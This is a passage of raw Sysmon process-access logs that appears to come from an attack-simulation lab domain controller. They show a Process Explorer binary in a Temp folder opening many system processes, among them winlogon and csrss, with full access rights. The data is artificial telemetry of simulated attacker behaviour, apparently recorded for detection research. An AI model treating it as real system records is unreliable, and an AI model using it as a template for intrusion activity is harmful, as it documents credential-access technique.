(x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 